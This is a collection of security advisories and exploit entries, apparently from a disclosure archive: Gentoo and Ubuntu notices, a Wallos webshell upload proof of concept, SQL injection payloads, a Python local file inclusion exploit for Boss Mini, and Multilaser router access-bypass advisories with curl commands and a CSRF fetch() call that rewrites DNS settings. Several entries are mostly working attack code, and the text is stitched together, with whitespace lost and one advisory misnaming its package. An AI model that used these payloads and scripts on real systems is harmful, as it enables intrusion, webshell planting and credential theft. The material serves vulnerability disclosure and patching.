Gentoo Linux Security Advisory 202403-2 - Multiple vulnerabilities have been discovered in Blender, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 3.1.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Blender: Multiple Vulnerabilities  
     Date: March 03, 2024  
     Bugs: #834011  
       ID: 202403-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Blender, the worst of  
which could lead to arbitrary code execution.

Background  
==========

Blender is a 3D Creation/Animation/Publishing System.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
media-gfx/blender  < 3.1.0       >= 3.1.0

Description  
===========

Multiple vulnerabilities have been discovered in Blender. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Blender users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-gfx/blender-3.1.0"

References  
==========

[ 1 ] CVE-2022-0544  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0544  
[ 2 ] CVE-2022-0545  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0545  
[ 3 ] CVE-2022-0546  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0546

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202403-02

Wallos versions prior to 1.11.2 suffer from a remote shell upload vulnerability.

# Exploit Title: Wallos - File Upload RCE (Authenticated)  
# Date: 2024-03-04  
# Exploit Author: sml@lacashita.com  
# Vendor Homepage: https://github.com/ellite/Wallos  
# Software Link: https://github.com/ellite/Wallos  
# Version: < 1.11.2  
# Tested on: Debian 12

Wallos allows you to upload an image/logo when you create a new subscription.  
This can be bypassed to upload a malicious .php file.

POC  
---

1) Log into the application.  
2) Go to "New Subscription"  
3) Upload Logo and choose your webshell .php  
4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:

--- SNIP -----------------

POST /endpoints/subscription/add.php HTTP/1.1

Host: 192.168.1.44

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.1.44/

Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324

Origin: http://192.168.1.44

Content-Length: 7220

Connection: close

Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="name"

test

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo"; filename="revshell.php"

Content-Type: image/jpeg

GIF89a;

<?php  
system($_GET['cmd']);  
?> 

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo-url"

----- SNIP -----

5) You will get the response that your file was uploaded ok:

{"status":"Success","message":"Subscription updated successfully"}

6) Your file will be located in:   
http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php

Wallos Shell Upload

Gentoo Linux Security Advisory 202403-1 - A vulnerability has been discovered in Tox which may lead to remote code execution. Versions greater than or equal to 0.2.13 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Tox: Remote Code Execution  
     Date: March 03, 2024  
     Bugs: #829650  
       ID: 202403-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Tox which may lead to remote code  
execution.

Background  
==========

Tox is easy-to-use software that connects you with friends and family  
without anyone else listening in.

Affected packages  
=================

Package       Vulnerable    Unaffected  
------------  ------------  ------------  
net-libs/tox  < 0.2.13      >= 0.2.13

Description  
===========

A vulnerability has been discovered in btrbk. Please review the CVE  
identifier referenced below for details.

Impact  
======

A stack-based buffer overflow allows remote attackers to crash the  
process or potentially execute arbitrary code via a network packet.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Tox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/tox-0.2.13"

References  
==========

[ 1 ] CVE-2021-44847  
      https://nvd.nist.gov/vuln/detail/CVE-2021-44847

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202403-01

This is an interesting whitepaper called Compromising Industrial Processes using Web-Based Programmable Logic Controller Malware. The authors present a novel approach to developing programmable logic controller (PLC) malware that proves to be more flexible, resilient, and impactful than current strategies.

Compromising Industrial Processes Using Web-Based Programmable Logic Controller Malware

Ubuntu Security Notice 6669-1 - Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information, bypass security restrictions, cross-site tracing, or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6669-1March 04, 2024thunderbird vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Thunderbird.Software Description:- thunderbird: Mozilla Open Source mail and newsgroup clientDetails:Multiple security issues were discovered in Thunderbird. If a user weretricked into opening a specially crafted website in a browsing context, anattacker could potentially exploit these to cause a denial of service,obtain sensitive information, bypass security restrictions, cross-sitetracing, or execute arbitrary code. (CVE-2024-0741, CVE-2024-0742,CVE-2024-0747, CVE-2024-0749, CVE-2024-0750, CVE-2024-0751, CVE-2024-0753,CVE-2024-0755, CVE-2024-1547, CVE-2024-1548, CVE-2024-1549, CVE-2024-1550,CVE-2024-1553)Cornel Ionce discovered that Thunderbird did not properly manage memory whenopening the print preview dialog. An attacker could potentially exploitthis issue to cause a denial of service. (CVE-2024-0746)Alfred Peters discovered that Thunderbird did not properly manage memory whenstoring and re-accessing data on a networking channel. An attacker couldpotentially exploit this issue to cause a denial of service. (CVE-2024-1546)Johan Carlsson discovered that Thunderbird incorrectly handled Set-Cookieresponse headers in multipart HTTP responses. An attacker could potentiallyexploit this issue to inject arbitrary cookie values. (CVE-2024-1551)Gary Kwong discovered that Thunderbird incorrectly generated codes on 32-bitARM devices, which could lead to unexpected numeric conversions or undefinedbehaviour. An attacker could possibly use this issue to cause a denial ofservice. (CVE-2024-1552)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:  thunderbird                     1:115.8.1+build1-0ubuntu0.23.10.1Ubuntu 22.04 LTS:  thunderbird                     1:115.8.1+build1-0ubuntu0.22.04.1Ubuntu 20.04 LTS:  thunderbird                     1:115.8.1+build1-0ubuntu0.20.04.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6669-1  CVE-2024-0741, CVE-2024-0742, CVE-2024-0746, CVE-2024-0747,  CVE-2024-0749, CVE-2024-0750, CVE-2024-0751, CVE-2024-0753,  CVE-2024-0755, CVE-2024-1546, CVE-2024-1547, CVE-2024-1548,  CVE-2024-1549, CVE-2024-1550, CVE-2024-1551, CVE-2024-1552,  CVE-2024-1553Package Information:  https://launchpad.net/ubuntu/+source/thunderbird/1:115.8.1+build1-0ubuntu0.23.10.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.8.1+build1-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/thunderbird/1:115.8.1+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6669-1

Employee Management System version 1.0-2024 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

    ## Title: employee_akpoly-management-system-1.0-2024 Multiple-SQLi## Author: nu11secur1ty## Date: 03/01/2024## Vendor: https://www.sourcecodester.com/users/walterjnr1## Software: https://www.sourcecodester.com/php/16999/employee-management-system.html## Reference: https://portswigger.net/web-security/sql-injection## Description:Potential SQLi detected in password parameter. Please confirm itmanually... The payload from the puncher_SQLi_bypass_authenticationmodule was submitted successfully after the test. You must testmanually to confirm this vulnerability! By using this vulnerabilitythe attackercan get control against an admin account and even more bad things!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: txtpassword (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR NOT2215=2215# TKHd&btnlogin=    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR (SELECT2145 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT(ELT(2145=2145,1))),0x716a787171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JjHm&btnlogin=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' AND (SELECT3563 FROM (SELECT(SLEEP(7)))nLaZ)# ZzRM&btnlogin=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Walterjnr1/2024/employee_akpoly-1.0-2024)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/employeeakpoly-10-2024-multiple-sqli.html)## Time spend:00:35:00

Employee Management System 1.0-2024 SQL Injection

Boss Mini version 1.4.0 suffers from a local file inclusion vulnerability.

    # Exploit Title: Boss Mini 1.4.0 - local file inclusion# Date: 07/12/2023# Exploit Author: [nltt0] (https://github.com/nltt-br))# CVE: CVE-2023-3643''' _____       _                              _____ /  __ \     | |                            /  ___|| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. | |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/                             __/ |                                            |___/                  '''from requests import post from urllib.parse import quotefrom argparse import ArgumentParsertry:    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')    parser.add_argument('--domain', required=True, help='Application domain')    parser.add_argument('--file', required=True, help='Local file')    args = parser.parse_args()    host = args.domain    file = args.file    url = '{}/boss/servlet/document'.format(host)    file2 = quote(file, safe='')    headers = {        'Host': host,        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',        'Content-Type': 'application/x-www-form-urlencoded',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)    }    data = {        'path': file2    }    try:        req = post(url, headers=headers, data=data, verify=False)        if req.status_code == 200:            print(req.text)    except Exception as e:        print('Error in {}'.format(e))          except Exception as e:    print('Error in {}'.format(e))

Boss Mini 1.4.0 Local File Inclusion

Multilaser RE160 versions 5.07.51_pt_MTL01 and 5.07.52_pt_MTL01 suffer from an access control bypass vulnerability through cookie manipulation.

=====[Tempest Security Intelligence - Security Advisory -  
CVE-2023-38946]=======

  Access Control Bypass in Multilaser router's Web Management Interface

  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >

=====[Table of  
Contents]========================================================

1. Overview  
2. Detailed description  
3. Other contexts & solutions  
4. Acknowledgements  
5. Timeline  
6. References

=====[1.  
Overview]==============================================================

* Systems affected: Multilaser RE160 web interface -  
V5.07.51_pt_MTL01(verified)  
                                                   -  
V5.07.52_pt_MTL01(verified)  
                                        (other routers/versions may be  
affected)  
* Release date: 28/02/2024  
* CVSS score: 7.7 / High  
* CVSS vector:  
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N  
* Impact: This vulnerability allows attackers to bypass the access control  
of  
          the router's web interface and perform management actions, such as  
          changing the DNS settings, enabling router remote access,  
changing the  
          IP routing table, and retrieving the WiFi and management  
application  
          passwords. A noteworthy aspect also regards the fact that the  
attack  
          can be conducted remotely.

=====[2. Detailed  
description]==================================================

The affected Multilaser router has a web management interface designed to  
graphically assist users in configuring features and diagnosing problems.  
However, there is a bug in its access control mechanism that allows  
unauthenticated users to access the router's management features.

In order to exploit this bug, it is necessary to add an "admin:" cookie in  
the  
requests. The following example shows how an unauthenticated user (not  
bearing  
a credential or session token) could perform it by using the curl tool[1]  
to  
retrieve, for example, a backup of the router config, which contains its  
web  
interface password:

[snippet]

$ # traditional unauthenticated request being redirected to the login page  
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E  
'HTTP/|Locatio'  
HTTP/1.0 302 Redirect  
Location: http://[routerIpAddress]/login.asp  
$  
$ # malicious unauthenticated request getting the web interface password  
$ # (in this example: "pass123")  
$ curl -isH 'Cookie: admin:' [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg |  
grep  
-E 'HTTP/|http_passwd'  
HTTP/1.0 200 OK  
http_passwd=pass123

[/snippet]

By performing the aforementioned steps, an attacker gains access to all  
features  
of the web interface, either by exploiting the issue in other endpoints or  
by  
using the interface password, contained in the router config, as a  
traditional  
user.

This vulnerability can be exploited remotely via a malicious mobile/desktop  
application performing HTTP requests against the router, or locally by  
connecting to a vulnerable router (such as through the wireless  
infrastructure  
of a coffee shop or airport).

=====[3. Other contexts &  
solutions]============================================

Conceptually, in order to fix this issue, the server receiving the request  
must  
always validate the value of the cookie as a prerequisite for enforcing  
access  
control. Besides that, this value cannot be predictable. Upon not receiving  
a  
valid session token within the request, users should be redirected to the  
login  
page.

Practically, updating to the latest firmware (V5.07.52_pt_MTL01) will  
reduce the  
attack window for this vulnerability, limiting the exploitation to only work  
when there is an active user session on the router. However, this equipment  
is  
also affected by another vulnerability with the same impact and no attack  
window  
limitation[3].

Furthermore, Multilaser informed that they contacted the firmware vendor of  
the  
model RE160, but due to the age of the equipment and its limitations, it  
will  
not receive an update. Therefore, it is recommended to replace the RE160  
router  
with a new one that is receiving updates (such as RE160V or RE163V)[4][5].

=====[4.  
Acknowledgements]======================================================

  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >  
                              < twitter.com/palulabr >  
  Tempest Security Intelligence[2]

=====[5.  
Timeline]==============================================================

28/04/2023 - The bug regarding model RE160 was reported to vendor;  
29/06/2023 - A new contact was made with the company;  
29/06/2023 - Vendor sent the available latest firmware for RE160;  
07/07/2023 - It was confirmed that the latest firmware was still vulnerable;  
26/10/2023 - Vendor informed that RE160 will not receive a full fix.

=====[6.  
References]============================================================

  [1] https://curl.se  
  [2] https://tempest.com.br  
  [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38945  
  [4]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v  
  [5]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v

Multilaser RE160 Cookie Manipulation Access Bypass

Multilaser RE160V web management interface versions 12.03.01.08_pt and 12.03.01.09_pt along with RE160 versions 5.07.51_pt_MTL01 and 5.07.52_pt_MTL01 suffer from an access control bypass vulnerability through URL manipulation.

    =====[Tempest Security Intelligence - Security Advisory -CVE-2023-38945]=======  Access Control Bypass in Multilaser routers' Web Management Interface  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >=====[Table ofContents]========================================================1. Overview2. Detailed description3. Other contexts & solutions4. Acknowledgements5. Timeline6. References=====[1.Overview]==============================================================* Systems affected: Multilaser RE160 web interface -V5.07.51_pt_MTL01(verified)                                                   -V5.07.52_pt_MTL01(verified)                                        (other routers/versions may beaffected)                    Multilaser RE160V web interface - V12.03.01.08_pt(verified)                                                    - V12.03.01.09_pt(verified)                                        (other routers/versions may beaffected)                    Multilaser RE163V web interface - V12.03.01.08_pt(verified)                                        (other routers/versions may beaffected)* Release date: 28/02/2024* CVSS score: 7.7 / High* CVSS vector:CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N* Impact: This vulnerability allows attackers to bypass the access controlof          the routers' web interface and perform management actions, such as          changing the DNS settings, enabling router remote access,changing the          IP routing table, and retrieving the WiFi and managementapplication          passwords. A noteworthy aspect also regards the fact that theattack          can be conducted remotely.=====[2. Detaileddescription]==================================================The affected Multilaser routers have a web management interface designed tographically assist users in configuring features and diagnosing problems.However, there is a bug in its access control mechanism that allowsunauthenticated users to access routers' management features.In order to exploit this bug, it is necessary to add a specific extensionat theend of the URLs. Some acceptable extension values are: js, css, png, jpg,gif,jsp. The following example shows how an unauthenticated user (not bearing acredential or session token) could perform it by using the curl tool[1] toretrieve, for example, a backup of the RE160 router config, which containsitsweb interface password:[snippet]$ # traditional unauthenticated request being redirected to the login page$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E'HTTP/|Locatio'HTTP/1.0 302 RedirectLocation: http://[routerIpAddress]/login.asp$$ # malicious unauthenticated request getting the web interface password$ # (in this example: "pass123")$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/.js | grep -E'HTTP/|http_pass'HTTP/1.0 200 OKhttp_passwd=pass123[/snippet]Furthermore, the next example presents part of a JavaScript code that couldbeadded to a malicious website with the purpose of changing the router's DNSaddress and enabling remote access on vulnerable RE160V and RE163V routers.This can be achieved by exploiting this access control issue and a CSRF[3]:[code]fetch('http://[routerIpAddress]/goform/setSysTools/.js', {    'method': 'POST',    'mode': 'no-cors',    'headers': {        'Content-Type': 'application/x-www-form-urlencoded'    },    'body':'module2=wanAdvCfg&module3=lanCfg&lanDns1=[newDnsAddress]&lanDns2=&    module4=remoteWeb&remoteWebEn=true&remoteWebType=any&remoteWebPort=8080'})[/code]By performing the aforementioned steps, an attacker can gain access to allfeatures of the web interface.This vulnerability can be exploited remotely via a malicious website or amobile/desktop application performing HTTP requests against the router. Andalso locally, by connecting to a vulnerable router (such as through thewirelessinfrastructure of a coffee shop or airport).=====[3. Other contexts &solutions]============================================Conceptually, in order to fix this issue, the server receiving the requestmustalways validate the session token in authenticated features as aprerequisitefor enforcing access control, regardless of any extension in the URL. Uponnotreceiving a valid session token within the request, users should beredirectedto the login page.Practically, to mitigate this issue, the RE160V should be updated tofirmwareV12.03.01.12 or newer[4], the RE163V to firmware V12.03.01.10 or newer[5].Multilaser informed that they contacted the firmware vendor of the modelRE160,but due to the age of the equipment and its limitations, it will notreceive anupdate to fix the issue. Therefore, it is recommended to replace the RE160router with a new one that has received the fix (such as RE160V or RE163V).=====[4.Acknowledgements]======================================================  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >                              < twitter.com/palulabr >  Tempest Security Intelligence[2]=====[5.Timeline]==============================================================13/02/2023 - The latest available firmware for model RE163V (V12.03.01.10)fixedthe bug;28/04/2023 - The bug regarding model RE160V was reported to the vendor;29/06/2023 - A new contact was made with the company;29/06/2023 - Vendor shared a firmware update (V12.03.01.09) for RE160V;07/07/2023 - The same bug in model RE160 was reported to the vendor;16/10/2023 - Vendor shared a new firmware for RE160V (V12.03.01.12) wherethebug was fixed;26/10/2023 - Vendor informed that RE160 will not receive a fix;26/10/2023 - Vendor released the RE160V update on its website[4].=====[6.References]============================================================  [1] https://curl.se  [2] https://tempest.com.br  [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31152  [4]https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v  [5]https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v

Multilaser RE160V / RE160 URL Manipulation Access Bypass

Multilaser RE160V web management interface versions 12.03.01.09_pt and 12.03.01.10_pt suffer from an access control bypass vulnerability through header manipulation.

ulldisclosure-bounces@seclists.org>  
Status: RO  
Content-Length: 5433  
Lines: 153

=====[Tempest Security Intelligence - Security Advisory -  
CVE-2023-38944]=======

  Access Control Bypass in Multilaser routers' Web Management Interface

  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >

=====[Table of  
Contents]========================================================

1. Overview  
2. Detailed description  
3. Other contexts & solutions  
4. Acknowledgements  
5. Timeline  
6. References

=====[1.  
Overview]==============================================================

* Systems affected: Multilaser RE160V web interface - V12.03.01.09_pt  
(verified)  
                                        (other routers/versions may be  
affected)  
                    Multilaser RE163V web interface - V12.03.01.10_pt  
(verified)  
                                        (other routers/versions may be  
affected)  
* Release date: 28/02/2024  
* CVSS score: 7.7 / High  
* CVSS vector:  
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N  
* Impact: This vulnerability allows attackers to bypass the access control  
of  
          the routers' web interface and perform management actions, such as  
          changing the DNS settings, enabling router remote access,  
changing the  
          IP routing table, and retrieving the WiFi and management  
application  
          passwords. A noteworthy aspect also regards the fact that the  
attack  
          can be conducted remotely.

=====[2. Detailed  
description]==================================================

The affected Multilaser routers have a web management interface designed to  
graphically assist users in configuring features and diagnosing problems.  
However, there is a bug in its access control mechanism that allows  
unauthenticated users to access the routers' management features.

In order to exploit this bug, it is necessary to remove the Host header of  
the  
HTTP requests. The following example shows how an unauthenticated user (not  
bearing a credential or session token) could perform it by using the curl  
tool[1] to retrieve, for example, a backup of the router config:

[snippet]  
$ # traditional unauthenticated request being redirected to the login page  
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg | head -8  
HTTP/1.0 302 Redirect  
Server: GoAhead-Webs  
Date: Sun Jun 28 11:59:42 2009  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Type: text/html  
Location: http://[routerIpAddress]/login.html

$ # malicious unauthenticated request getting the router config  
$ curl -isOH 'Host:' [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg  
$ head -8 RouterCfm.cfg  
HTTP/1.0 200 OK  
Date: Sun Jun 28 12:00:00 2009  
Server: GoAhead-Webs  
Last-modified: Sun Jun 28 12:00:00 2009  
Content-length: 16108  
Content-type: config/conf  
Connection: close

[/snippet]

By performing the aforementioned steps, an attacker gains access to all  
features  
of the web interface, either by exploiting the issue in other endpoints or  
by  
using the interface password, contained in the router config, as a  
traditional  
user:

[snippet]

$ # getting the web interface password (in this example: "myPass333")  
$ # stored in base64 in the config file  
$ awk -F 'd=' '/http_passwd=/{ print $2 }' RouterCfm.cfg | tr -d '\15'  
bXlQYXNzMzMz  
$ # decoding the web interface password  
$ echo "bXlQYXNzMzMz" | base64 -d  
myPass333

[/snippet]

This vulnerability can be exploited remotely via a malicious mobile/desktop  
application performing HTTP requests against the router, or locally by  
connecting to a vulnerable router (such as through the wireless  
infrastructure  
of a coffee shop or airport).

=====[3. Other contexts &  
solutions]============================================

Conceptually, in order to fix this issue, the server receiving the request  
must  
always validate the session token as a prerequisite for enforcing access  
control, regardless of any header. Upon not receiving a valid session token  
within the request, users should be redirected to the login page.

Practically, to mitigate this issue, the routers should be updated to  
firmware  
V12.03.01.12 or newer[3][4].

=====[4.  
Acknowledgements]======================================================

  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >  
                              < twitter.com/palulabr >  
  Tempest Security Intelligence[2]

=====[5.  
Timeline]==============================================================

28/04/2023 - The bug regarding model RE163V was reported to the vendor;  
29/06/2023 - A new contact was made with the company;  
29/06/2023 - Vendor informed they were analysing the bug;  
19/07/2023 - Vendor shared a new firmware update for RE163V;  
25/07/2023 - The same bug in model RE160V was reported to the vendor;  
04/08/2023 - Vendor shared a new firmware update for RE163V;  
30/08/2023 - Vendor fixed the bug in RE163V with firmware V12.03.01.12;  
16/10/2023 - Vendor fixed the bug in RE160V with firmware V12.03.01.12;  
26/10/2023 - vendor released the updates on its website[3][4].

=====[6.  
References]============================================================

  [1] https://curl.se  
  [2] https://tempest.com.br  
  [3]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v  
  [4]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v

Tag

#web